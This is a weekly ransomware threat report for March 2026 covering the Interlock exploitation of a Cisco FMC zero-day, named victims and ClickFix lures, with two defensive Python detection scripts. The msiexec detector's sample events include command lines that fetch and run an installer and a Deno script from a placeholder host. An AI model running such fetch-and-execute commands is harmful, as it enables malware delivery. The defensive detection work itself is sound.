Executive Summary
The week of March 13–20, 2026, was defined by a major zero-day disclosure: Amazon’s threat intelligence team and security researchers publicly confirmed that the Interlock ransomware gang had been exploiting CVE-2026-20131, a maximum-severity (CVSS 10.0) remote code execution flaw in Cisco Secure Firewall Management Center, as a zero-day since January 26 — 36 days before Cisco disclosed it on March 4. CISA ordered federal agencies to patch by March 22 and issued a broader advisory urging all organisations running Cisco FMC to review indicators of compromise immediately. The number of Interlock victims compromised during the zero-day window remains unknown but is expected to be significant given the prevalence of Cisco firewalls in enterprise environments.
On the operational front, Ransom-DB tracked 177 successful ransomware attacks in the week ending March 17, a slight contraction from 211 the previous week. Qilin dominated with 30 confirmed victims (17% of all activity), followed by Akira with 18 and emerging groups CoinbaseCartel (12) and CipherForce (11). Medusa continued its aggressive targeting of US municipalities and healthcare, claiming Henry County, Illinois, and adding to its growing list of government victims. DragonForce sustained a prolific pace across the UK, US, and South Africa, while LeakNet adopted ClickFix social engineering delivered through compromised legitimate websites — a significant tactical evolution that removes the group’s dependence on initial access brokers and signals its intent to scale operations rapidly.
In healthcare, the Payload ransomware group claimed Royal Bahrain Hospital with 110 GB of exfiltrated data on a March 23 deadline, and the Cegedim Santé breach in France — affecting 15.8 million administrative medical files from 1,500 doctors — was publicly disclosed as investigations continued. The Namibia Airports Company confirmed a 500 GB data theft by INC Ransom, and Passaic County, New Jersey, disclosed a malware attack that disabled government phone lines and IT systems for its 600,000 residents.
Key Statistics:
- Global: 177 ransomware attacks tracked in the week ending March 17; Interlock zero-day (CVE-2026-20131) exploited since January; LeakNet adopts ClickFix social engineering; Europol’s Operation Alice took down 373,000 dark-web sites
- Europe: 5+ incidents — DragonForce claimed Liverpool Philharmonic and Salford City College (UK); Akira posted Motorpal (Czech Republic) and bdtronic (Germany); Cegedim Santé breach disclosed affecting 15.8M French medical records
- Asia: 2+ incidents — Payload claimed Royal Bahrain Hospital (110 GB); The Gentlemen targeted Chase Asia in Thailand
- US: 10+ incidents — Medusa claimed Henry County, IL ($500K demand); Passaic County, NJ malware attack; DragonForce listed Mercedes-Benz of Arlington, Oriska Insurance, and multiple SMBs; CoinbaseCartel posted Augenomics and Neochromosome; Navia Benefit Solutions disclosed 2.7M-person breach
- Other: INC Ransom claimed Namibia Airports Company (500 GB); DragonForce listed The Unlimited (South Africa)
1. EUROPE
1.1 Government
No new government-sector ransomware incidents were confirmed in Europe during this reporting period.
1.2 Health, Municipalities & Non-commercial
The Cegedim Santé data breach continued to dominate European healthcare security discussions after the French health ministry announced that approximately 15.8 million administrative medical files had been stolen from the company’s MonLogicielMedical software platform. Cegedim Santé, a healthcare software vendor used by some 3,800 doctors in France, confirmed that 1,500 of those doctors’ practices were affected. While the breach was initially detected in late 2025, its full scope became public in early March 2026, and notification of affected individuals began on March 18. The exfiltrated data includes patient names, gender, dates of birth, contact information, and administrative comments, with approximately 165,000 files containing clinical notes that in “very limited cases” referenced sensitive conditions including HIV/AIDS status. French broadcaster France 24 reported that top politicians were among those affected. This is the largest healthcare data breach in French history and has drawn scrutiny from the CNIL, France’s data protection authority.
DragonForce claimed Salford City College, one of the largest further education providers in Greater Manchester, UK, on March 6, with the data publication deadline falling within the week 12 reporting window. The group threatened to release 256.92 GB of organisational data including confidential mental health assessment forms, spreadsheets containing personal information, and internal administrative documents. Salford City College serves thousands of students across multiple campuses, and the exposure of mental health records makes this breach particularly sensitive.
On March 20, DragonForce also listed Liverpool Philharmonic Hall (liverpoolphil.com), a prominent concert and events venue in Liverpool, UK. Details of the scope of the breach remain limited, but the listing continues DragonForce’s pattern of targeting cultural and non-commercial institutions across the United Kingdom.
1.3 Business
On March 20, Akira posted Motorpal, a prominent Czech manufacturer of diesel injection systems established in 1946. The group claims access to 31 GB of internal files including employee personal information, HR data, financial records, partner files, contracts, and project documentation. Motorpal is a significant employer in the Czech Republic and supplies fuel injection components to European and global automotive markets.
Akira simultaneously listed bdtronic, a German manufacturing company that provides dispensing, impregnation, hot riveting, and plasma application solutions to the automotive, electronics, telecommunications, and renewable energy industries. The attackers claim to have exfiltrated 40 GB of corporate data including employee personal information such as passports and driving licences, HR files, financial documents, and — notably — SpaceX project files, along with partner files and contracts.
2. ASIA
2.1 Government
No government-sector ransomware incidents were confirmed in Asia during this reporting period.
2.2 Health, Municipalities & Non-commercial
The Payload ransomware group announced on March 15 that it had compromised Royal Bahrain Hospital, a prominent 70-bed healthcare facility in Bahrain. The attackers claim to have exfiltrated 110 GB of sensitive data, which they displayed on their Tor-based leak site as proof of the breach. Payload set a March 23 deadline, threatening to release the stolen data — presumably including patient medical records and administrative information — if the ransom is not paid. The attack underscores the continued vulnerability of healthcare facilities in the Gulf region to ransomware operations.
2.3 Business
The Gentlemen ransomware group claimed responsibility on March 16 for a cyberattack against Chase Asia (chase.co.th), a prominent debt collection and non-performing loan management company in Thailand. Chase Asia handles sensitive financial data on behalf of banks and lending institutions across the Thai market, making the exfiltration of client data a significant concern for the broader financial services ecosystem in Southeast Asia. The Gentlemen, which emerged as one of the most operationally mature ransomware operations of 2025, uses dual-extortion tactics combining data theft with file encryption.
CoinbaseCartel posted Novogene, a genomics and bioinformatics company operating in China, on March 15. CoinbaseCartel specialises exclusively in data exfiltration — their operations never involve system encryption — making the stolen genomic and research data particularly concerning given the sensitivity of the information.
3. UNITED STATES
3.1 Government
Henry County, Illinois, disclosed a ransomware attack on March 18 that shut down access to multiple county systems. The county’s incident response team engaged an outside firm and notified multiple law enforcement and government cybersecurity agencies. While 911 and emergency dispatch services remained operational, administrative functions were severely impacted. The Medusa ransomware gang claimed the attack on March 20, giving the county eight days to pay a $500,000 ransom. Henry County has a population of approximately 50,000 and is located about two hours from Cedar Rapids, Iowa. In a separate incident approximately 30 minutes from the county seat, Monmouth College also announced a ransomware attack that had occurred during the holiday season.
Passaic County, New Jersey, announced on March 5 that a malware attack had disabled its IT systems and phone lines, with recovery efforts continuing through mid-March. The county, home to nearly 600,000 people in Northern New Jersey, confirmed it was working with federal and state officials to investigate and contain the incident. The New Jersey Department of Homeland Security confirmed it was actively supporting recovery efforts. County officials noted that several other local governments in New Jersey had experienced similar incidents, reflecting a broader trend of cybercriminal operations pivoting from major metropolitan targets to smaller municipalities in 2026.
3.2 Health, Municipalities & Non-commercial
Navia Benefit Solutions disclosed a data breach affecting approximately 2.7 million individuals after detecting suspicious activity on January 23, 2026. Investigators determined that an unauthorised actor had accessed systems between December 22, 2025, and January 15, 2026. The compromised data includes names, email addresses, phone numbers, dates of birth, Social Security numbers, and benefits-related information including HRA participation, FSA details, and COBRA enrolment data. Breach notifications began mailing on March 18, and Navia is offering 12 months of complimentary identity protection through Kroll. While no ransomware group has claimed the attack, the scale of data exposure makes this one of the largest US healthcare-adjacent breaches disclosed during the week.
CoinbaseCartel posted Augenomics, a healthcare technology company based in the US, on March 15. The data-exfiltration-only group claimed access to corporate and patient-related information. On the same day, CoinbaseCartel also listed Neochromosome, a US-based company, extending the group’s focus on biotechnology and health-adjacent targets.
3.3 Business
DragonForce was exceptionally active against US businesses during the week. On March 20 the group claimed Mercedes-Benz of Arlington, a leading car dealership, threatening to leak sensitive data unless negotiations begin. DragonForce also listed Oriska Insurance, a US-based insurer serving small and minority-owned businesses with surety bonding, workers’ compensation, and health coverage, threatening to publish client data and disrupt claims processing. Additional US victims claimed by DragonForce during the week include The Farese Group (a retirement planning firm), Edifice Design + Architecture, Construction Equipment Parts (heavy machinery), Centre Concrete (central Pennsylvania), and Conrad Capital Management (an investment advisory firm). The breadth of these claims — spanning automotive, insurance, financial services, construction, and manufacturing — illustrates DragonForce’s opportunistic approach to mid-market US businesses.
Sopower, an industrial electrical service company based in Louisiana offering electrical testing, commissioning, and substation services, was also listed by DragonForce.
CoinbaseCartel posted Tecnocap Group, a packaging and manufacturing company, on March 19, and ATG on March 15, continuing the group’s rapid pace of data-exfiltration claims against US businesses.
4. REST OF WORLD
4.1 Government
The Namibia Airports Company (NAC) confirmed on March 19 that it had fallen victim to a cyberattack by the INC Ransomware Group. The attackers claim to have stolen 500 GB of sensitive data including financial records, human resources information, and customer details. The Communications Regulatory Authority of Namibia (CRAN) confirmed the breach was carried out by INC Ransom and stated that none of the alleged data had been published to date, though the group’s countdown timer threatens eventual release. NAC stated that operations across all its facilities remain fully functional despite the breach. This marks the second INC Ransom attack in Namibia, following a 2025 breach of the Otjiwarongo Municipality, suggesting a sustained campaign against Namibian public infrastructure.
4.2 Health, Municipalities & Non-commercial
No incidents reported in this category this week.
4.3 Business
DragonForce listed The Unlimited (theunlimited.co.za), a South African financial services provider offering insurance products including health, auto, legal, and life insurance. The claim extends DragonForce’s reach into the African continent, a region that has seen increasing ransomware activity in 2026 as threat actors probe markets with potentially weaker cyber defences and incident response capabilities.
5. THREAT ACTOR ACTIVITY
Interlock dominated the threat intelligence narrative this week as researchers confirmed the group had been exploiting CVE-2026-20131 in Cisco Secure Firewall Management Center since January 26, 2026 — 36 days before the vulnerability was publicly disclosed on March 4. The flaw, rated CVSS 10.0, stems from insecure deserialisation of user-supplied Java byte streams and allows unauthenticated remote code execution as root. Amazon’s MadPot honeypot network detected the campaign and helped identify the attack chain: crafted HTTP requests to a specific FMC path trigger arbitrary Java code execution, after which the compromised system sends an HTTP PUT request to an external server to confirm exploitation, before fetching an ELF binary hosting additional Interlock tooling. CISA ordered federal agencies to patch by March 22 and issued a broader advisory urging immediate remediation. Interlock’s previous victims include DaVita, Kettering Health, Texas Tech University, and the city of Saint Paul, Minnesota.
Qilin continued as the most prolific ransomware operation globally with 30 confirmed victims in the week ending March 17, representing nearly 17% of all tracked activity. The group’s Rust-based encryptor and sophisticated double-extortion tactics have made it the dominant force in 2026, with over 200 victims claimed so far this year.
LeakNet made headlines by adopting ClickFix social engineering, delivered through compromised legitimate websites, as a newly confirmed initial access method. Victims encounter fake CAPTCHA verification checks on legitimate-but-compromised sites instructing them to copy and paste a msiexec.exe command into the Windows Run dialog. The payload is loaded using the Deno JavaScript runtime as an in-memory loader, evading traditional detection methods. This shift removes LeakNet’s dependence on initial access brokers, enabling the group to scale more rapidly and broadly. While LeakNet currently averages about three victims per month, the tactical evolution signals an intent to accelerate operations significantly.
Medusa maintained aggressive activity, claiming Henry County, Illinois, during the week with a $500,000 demand. A joint FBI/CISA/MS-ISAC advisory issued in March noted that Medusa developers and affiliates have impacted over 300 victims across critical infrastructure sectors.
DragonForce posted the highest volume of individual victim claims during the week, listing targets across the US, UK, and South Africa. The group has recently established a ransomware-as-a-service partnership with both Qilin and LockBit, creating a powerful distribution network. Its victims span automotive dealerships, insurance companies, educational institutions, cultural venues, construction firms, and financial advisory practices — reflecting a deliberately broad, opportunistic targeting strategy.
CoinbaseCartel continued its rise as an emerging threat with 12 victims during the week, including healthcare technology, genomics, and packaging companies. Notably, CoinbaseCartel operates exclusively through data exfiltration without deploying encryption, making detection more difficult as there is no operational disruption to trigger incident response.
6. KEY TAKEAWAYS
The Interlock zero-day exploitation of Cisco FMC underscores that patch windows are continuing to shrink. A 36-day gap between initial exploitation and public disclosure means that any organisation running vulnerable Cisco Secure Firewall Management Center infrastructure may have already been compromised, and retrospective threat hunting using the published indicators of compromise should be treated as urgent. CISA’s advisory to harden endpoint management systems — issued in the wake of both the Stryker/Intune incident (week 11) and the Cisco FMC campaign — reflects a growing recognition that device management platforms are high-value targets for adversaries seeking to maximise impact.
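One way to start the retrospective hunt described above, using the exploitation chain outlined in section 5 (an outbound HTTP PUT from the FMC host to an external server, followed by a fetch of a binary). This is an added example written for this report, not Cisco, CISA or Amazon tooling. The log format, the FMC host inventory, the internal DNS suffix and the IoC list are assumptions; the IoC entry is a placeholder because the report does not reproduce the published indicators, and the sample log lines are constructed.

```python
"""Retrospective hunt over egress-proxy logs for the Interlock post-exploitation
sequence: a Cisco FMC appliance makes an outbound HTTP PUT to an external server,
then fetches something from an external host.

Added example, not Cisco/CISA/Amazon tooling. The log format, the FMC inventory,
the internal DNS suffix and the IoC list are assumptions; the sample log lines
are constructed.
"""
from __future__ import annotations

import ipaddress
from dataclasses import dataclass
from datetime import datetime, timedelta

# Assumption: the asset inventory tells us which internal hosts are FMC appliances.
FMC_HOSTS = {"10.0.5.10"}

# Placeholder only: populate from the published Cisco/CISA indicators, which this
# report does not reproduce.
IOC_HOSTS = {"ioc-placeholder.invalid"}

# RFC 1918 ranges; anything else is treated as external (assumption: no other
# internal ranges are in use).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
INTERNAL_DNS_SUFFIX = ".corp.example"  # assumption


@dataclass
class Event:
    ts: datetime
    src: str
    method: str
    host: str
    path: str
    status: int


def parse_line(line: str) -> Event:
    """Parse one constructed log line of the form ts|src|method|host|path|status."""
    ts, src, method, host, path, status = line.strip().split("|")
    return Event(datetime.fromisoformat(ts), src, method.upper(), host, path, int(status))


def is_external(host: str) -> bool:
    """True when the destination is neither an RFC 1918 address nor an internal name."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return not host.lower().endswith(INTERNAL_DNS_SUFFIX)
    return not any(addr in net for net in INTERNAL_NETS)


def hunt(lines, window: timedelta = timedelta(minutes=30)) -> list[tuple]:
    """Return (timestamp, src, finding, detail) tuples for FMC hosts that
    (a) contacted a listed IoC host, or
    (b) made an outbound PUT and then fetched from an external host within
        `window`, the callback-then-download shape of the reported chain.
    """
    events = sorted((parse_line(l) for l in lines if l.strip()), key=lambda e: e.ts)
    findings: list[tuple] = []
    recent_puts: dict[str, list[Event]] = {}
    for e in events:
        if e.src not in FMC_HOSTS or not is_external(e.host):
            continue
        if e.host.lower() in IOC_HOSTS:
            findings.append((e.ts, e.src, "ioc_match", e.host))
        if e.method == "PUT":
            recent_puts.setdefault(e.src, []).append(e)
        elif e.method == "GET":
            prior = [p for p in recent_puts.get(e.src, []) if timedelta(0) <= e.ts - p.ts <= window]
            if prior:
                findings.append((e.ts, e.src, "put_then_fetch",
                                 f"PUT to {prior[0].host} then GET {e.host}{e.path}"))
    return findings


# Constructed sample: a benign internal fetch, the suspicious PUT/GET pair from the
# FMC host, a hit on the placeholder IoC, and an unrelated non-FMC host.
SAMPLE_LOG = """\
2026-02-02T10:14:02|10.0.5.10|GET|updates.corp.example|/fmc/patch|200
2026-02-02T10:15:30|10.0.5.10|PUT|203.0.113.45|/|200
2026-02-02T10:16:05|10.0.5.10|GET|198.51.100.7|/loader|200
2026-02-02T10:18:00|10.0.5.10|GET|ioc-placeholder.invalid|/beacon|200
2026-02-02T10:20:00|10.0.7.22|PUT|203.0.113.45|/|200
"""


def main() -> None:
    for ts, src, kind, detail in hunt(SAMPLE_LOG.splitlines()):
        print(f"{ts.isoformat()} {src} {kind}: {detail}")


if __name__ == "__main__":
    main()
```

The sequence rule is deliberately independent of the IoC list: an FMC management appliance has little reason to PUT to the internet and then pull a file back, so the shape of the traffic is worth flagging even where the indicators have rotated. Tune the window and the FMC inventory to the environment before running it over the full January–March log range.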
The adoption of ClickFix by LeakNet represents a concerning evolution in ransomware initial access. By delivering lures through legitimate-but-compromised websites rather than attacker-owned infrastructure, LeakNet bypasses many network-layer detection mechanisms. Organisations should consider blocking or monitoring for unexpected msiexec.exe executions initiated from user-accessible contexts and review web proxy logs for known compromised domains.
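The msiexec.exe monitoring suggested above, applied to the ClickFix chain described in section 5 (a command pasted into the Run dialog that pulls a package from a URL, then the Deno runtime loading the payload). This is an added example written for this report, not LeakNet tooling or any vendor’s detection rule. The event shape (image, parent image, command line) is modelled on a Sysmon or EDR process-creation record but is an assumption, as is explorer.exe being the parent of Run-dialog launches; the sample events and the placeholder domain are constructed.

```python
"""Endpoint detection for the ClickFix pattern: msiexec.exe launched from an
interactive context with a remote package URL, followed by the Deno runtime
executing a remote script or being spawned by msiexec.

Added example, not LeakNet tooling or a vendor rule. The event shape and the
explorer.exe parent assumption are ours; the sample events are constructed.
"""
from __future__ import annotations

import re

URL_RE = re.compile(r"https?://", re.IGNORECASE)
# Commands typed into the Run dialog are spawned by the shell (assumption: explorer.exe).
INTERACTIVE_PARENTS = {"explorer.exe"}
# msiexec quiet-install switches (/q, /qn, /qb) hide the installer UI from the user.
QUIET_RE = re.compile(r"(?<!\S)/q[nb]?\b", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyse(event: dict) -> list[str]:
    """Return the reasons a process-creation event looks like ClickFix; empty if benign."""
    image = basename(event["image"])
    parent = basename(event["parent"])
    cmd = event["cmdline"]
    reasons: list[str] = []

    # Local .msi installs by admins and the msiexec service (/V) carry no URL and pass.
    if image == "msiexec.exe" and URL_RE.search(cmd):
        reasons.append("msiexec installing a package from a URL")
        if parent in INTERACTIVE_PARENTS:
            reasons.append("launched from an interactive user context (Run dialog)")
        if QUIET_RE.search(cmd):
            reasons.append("quiet install switch suppresses the installer UI")

    if image == "deno.exe" and (URL_RE.search(cmd) or parent == "msiexec.exe"):
        reasons.append("Deno runtime executing a remote script or spawned by msiexec")

    return reasons


def detect(events: list[dict]) -> list[dict]:
    """Run analyse() over a batch and return only the flagged events with their reasons."""
    flagged = []
    for ev in events:
        reasons = analyse(ev)
        if reasons:
            flagged.append({"image": ev["image"], "cmdline": ev["cmdline"], "reasons": reasons})
    return flagged


# Constructed sample events: two benign msiexec uses, then the ClickFix pair.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\msiexec.exe", "parent": r"C:\Windows\System32\services.exe",
     "cmdline": r"C:\Windows\System32\msiexec.exe /V"},
    {"image": r"C:\Windows\System32\msiexec.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"msiexec.exe /i C:\deploy\agent.msi /qn"},
    {"image": r"C:\Windows\System32\msiexec.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"msiexec.exe /i https://captcha-placeholder.invalid/verify.msi /qn"},
    {"image": r"C:\Users\alice\AppData\Local\Temp\deno.exe", "parent": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"deno.exe run -A https://captcha-placeholder.invalid/loader.js"},
]


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit["cmdline"])
        for reason in hit["reasons"]:
            print("  -", reason)
```

The rule keys on the combination the report describes rather than on msiexec.exe alone, so routine software deployment from local paths stays quiet while a user-initiated remote install with the UI suppressed scores three reasons. Pair it with the proxy-log review for compromised domains, since the first signal an organisation sees may be the web request for the .msi rather than the process event.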
Medusa’s continued targeting of US municipalities and healthcare — now spanning Mississippi, Illinois, and New Jersey in recent weeks — confirms that smaller government entities remain disproportionately vulnerable. The typical ransom demand of $500,000–$800,000 targets organisations with limited cybersecurity budgets that may struggle to afford both the ransom and the cost of extended recovery.
DragonForce’s sheer volume and breadth of targeting, combined with its ransomware-as-a-service partnerships with Qilin and LockBit, makes it one of the most operationally diverse groups in the current landscape. Organisations across all sectors and sizes should treat DragonForce indicators of compromise as high-priority detections.